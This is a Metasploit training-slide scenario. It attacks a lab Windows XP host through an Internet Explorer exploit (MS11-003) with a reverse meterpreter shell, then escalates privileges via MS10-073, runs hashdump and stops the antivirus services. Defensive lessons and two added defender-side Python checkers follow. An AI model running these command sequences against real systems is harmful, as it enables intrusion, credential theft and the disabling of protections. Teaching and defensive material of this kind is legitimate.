Metasploit Scenarios
Scenario 2

Http:://eromang.zataz.com - Http://twitter.com/eromang
Scenario 2 : Topology

Target (192.168.111.0/24) <-> Firewall Gateway <-> Attacker (192.168.178.0/24)

Target :
- Windows XP SP3 - User «test» has a limited account profile
- IP : 192.168.111.129 - Default gateway : 192.168.111.128
- Antivirus : Ad-Aware Free / Windows Defender
- Local Windows Firewall activated
- Vulnerable to MS11-003 & MS10-073

Firewall Gateway :
- Eth0 : 192.168.111.128 (internal interface)
- Eth1 : 192.168.178.59 (external interface)

Attacker :
- IP : 192.168.178.21
Scenario 2 : Firewall rules

• Firewall administration by SSH only from the internal network
• The internal network is allowed to use «Any» protocols towards the external network
Scenario 2 : Story-Board

✤   This network topology corresponds to most broadband ADSL Internet connections for home users and SMBs.
✤   The target has three active local countermeasure products; as you will see, they do not react to anything!
    ✤   Up-to-date Ad-Aware Free with default configuration.
    ✤   Windows Defender with default configuration.
    ✤   Windows Firewall with default configuration.
✤   The target is vulnerable to the MS11-003 Internet Explorer vulnerability and to the MS10-073 Keyboard Layout vulnerability.
    ✤   MS11-003 will be our entry point.
    ✤   MS10-073 will be our privilege escalation vector (as used by Stuxnet).
Scenario 2 : Story-Board

✤   The attacker sends a Twitter message to the target. The message contains a malicious URL (possibly shortened) that exploits the Internet Explorer MS11-003 vulnerability.
✤   The target clicks on the provided link and MS11-003 is exploited. After exploitation a reverse_tcp meterpreter payload, connecting back on port 4444/TCP, is launched.
✤   The attacker checks the installed countermeasures and tries to kill them, without success because of the limited privileges.
✤   The attacker has to check whether these Microsoft patches are installed before attempting the MS10-073 privilege escalation:
    ✤   MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957)
    ✤   If any of these patches is installed, the MS10-073 privilege escalation is not possible. The winenum script is the way to check this.
✤   The attacker then runs the MS10-073 post-exploitation privilege escalation.
✤   The attacker stops the following services : Windows Defender / Lavasoft Ad-Aware Service
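Added here as a defender-side example, not part of the original deck: a Python check that reads `wmic qfe list`-style output from a host and reports whether any of the three KBs named on the slide (each of which closes the MS10-073 escalation) is installed. The sample output is constructed, and the KB numbers other than the three from the slide are placeholders.

```python
import re

# The three bulletins the slide names; any one of them closes MS10-073.
MS10_073_FIXES = {
    "KB981957": "MS10-073",
    "KB2436673": "MS10-098",
    "KB2479628": "MS11-012",
}

KB_RE = re.compile(r"\bKB(\d{6,7})\b", re.IGNORECASE)


def installed_kbs(qfe_output):
    """KB ids found in 'wmic qfe list' style text; header and blank lines are ignored."""
    return {"KB" + m.group(1) for m in KB_RE.finditer(qfe_output)}


def ms10_073_status(qfe_output):
    """Report which of the relevant fixes are present and whether the host is covered."""
    found = installed_kbs(qfe_output)
    present = [kb for kb in MS10_073_FIXES if kb in found]
    return {
        "patched": bool(present),
        "fixes_present": [f"{MS10_073_FIXES[kb]} ({kb})" for kb in present],
        "missing": [f"{MS10_073_FIXES[kb]} ({kb})" for kb in MS10_073_FIXES if kb not in found],
    }


# Constructed sample output; KB1111111 and KB2222222 are placeholders, not real articles.
SAMPLE_UNPATCHED = """\
Caption                                      Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=1111111   Security Update  KB1111111  10/13/2010
http://support.microsoft.com/?kbid=2222222   Security Update  KB2222222  11/10/2010
"""

# The same host after KB981957 (MS10-073) has been applied.
SAMPLE_PATCHED = SAMPLE_UNPATCHED + (
    "http://support.microsoft.com/?kbid=981957    Security Update  KB981957   12/15/2010\n"
)
```

A host whose report comes back with `patched` false is exactly the state the storyboard relies on, so it belongs at the top of the patching queue.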
Scenario 2 : Metasploit commands
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 80
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

migrate X -> to another process
kill X -> run twice, for the notepad.exe and the main iexplore.exe processes
run getcountermeasure
run getcountermeasure -k
getuid
shell
echo %USERNAME%
getprivs
getsystem
hashdump
sysinfo
ipconfig
route
background
Scenario 2 : Metasploit commands

use post/windows/escalate/ms10_073_kbdlayout
set SESSION 1
run

sessions -i 1
getuid
migrate X -> to a «NT AUTHORITY\SYSTEM» process
shell
echo %USERNAME%
net start
net stop "Lavasoft Ad-Aware Service"
net stop "Windows Defender"
net start
ps
Scenario 2 : Lessons Learned

• Update your OS and applications!
• Never click on unknown links, especially shortened URLs, from unknown sources!
• Don't trust your antivirus! Select an antivirus that detects basic attacks!
• Don't trust your firewalls (local or remote)!
• Don't allow «Any» outbound protocol connections from your internal network to untrusted networks! Limit your outbound connections to your real needs.
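Added here as a defender-side example, not part of the original deck: a small Python checker for the gateway policy. It parses connection-log lines in a constructed, made-up format and flags outbound flows that are not on an egress allowlist (the last Lessons Learned point) and SSH to the gateway's external interface (the Firewall rules slide). The allowlisted services, the log format and the resolver address are assumptions.

```python
import ipaddress
import re

INTERNAL_NET = ipaddress.ip_network("192.168.111.0/24")
GATEWAY_EXTERNAL = ipaddress.ip_address("192.168.178.59")

# Egress allowlist (protocol, destination port). The deck's gateway allowed «Any»
# outbound; this is the restrictive policy the slide recommends (assumed service list).
ALLOWED_EGRESS = {("TCP", 80), ("TCP", 443), ("UDP", 53)}

# Constructed log format (not any real firewall's):
#   <timestamp> proto=<TCP|UDP> src=<ip> spt=<port> dst=<ip> dpt=<port>
LOG_RE = re.compile(r"^(?P<ts>\S+) proto=(?P<proto>TCP|UDP) src=(?P<src>\S+) "
                    r"spt=(?P<spt>\d+) dst=(?P<dst>\S+) dpt=(?P<dpt>\d+)$")


def parse_line(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # headers, blanks and unknown formats are skipped
    d = m.groupdict()
    return {"ts": d["ts"], "proto": d["proto"],
            "src": ipaddress.ip_address(d["src"]), "spt": int(d["spt"]),
            "dst": ipaddress.ip_address(d["dst"]), "dpt": int(d["dpt"])}


def policy_findings(log_text):
    """Flows that violate the two rules the deck states or recommends."""
    findings = []
    for line in log_text.splitlines():
        c = parse_line(line)
        if c is None:
            continue
        flow = f'{c["ts"]} {c["src"]}:{c["spt"]} -> {c["dst"]}:{c["dpt"]}/{c["proto"]}'
        outbound = c["src"] in INTERNAL_NET and c["dst"] not in INTERNAL_NET
        if outbound and (c["proto"], c["dpt"]) not in ALLOWED_EGRESS:
            findings.append(("egress-not-allowlisted", flow))
        # SSH administration of the gateway is allowed from the internal side only.
        if (c["dst"] == GATEWAY_EXTERNAL and c["proto"] == "TCP" and c["dpt"] == 22
                and c["src"] not in INTERNAL_NET):
            findings.append(("ssh-admin-from-external", flow))
    return findings


# Constructed traffic for the scenario: DNS, the HTTP fetch of the exploit page
# (both allowlisted), the reverse_tcp callback on 4444/TCP (not allowlisted), then an
# external host trying the gateway's SSH port. 192.168.178.1 is an assumed resolver.
SAMPLE_LOG = """\
2011-03-01T10:02:11 proto=UDP src=192.168.111.129 spt=1049 dst=192.168.178.1 dpt=53
2011-03-01T10:02:12 proto=TCP src=192.168.111.129 spt=1050 dst=192.168.178.21 dpt=80
2011-03-01T10:02:15 proto=TCP src=192.168.111.129 spt=1052 dst=192.168.178.21 dpt=4444
2011-03-01T10:03:40 proto=TCP src=192.168.178.21 spt=40000 dst=192.168.178.59 dpt=22
"""
```

Note that the allowlist would still pass the initial HTTP fetch of the exploit page; egress filtering breaks the callback, not the browser compromise, which is why the patching point on the same slide comes first.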
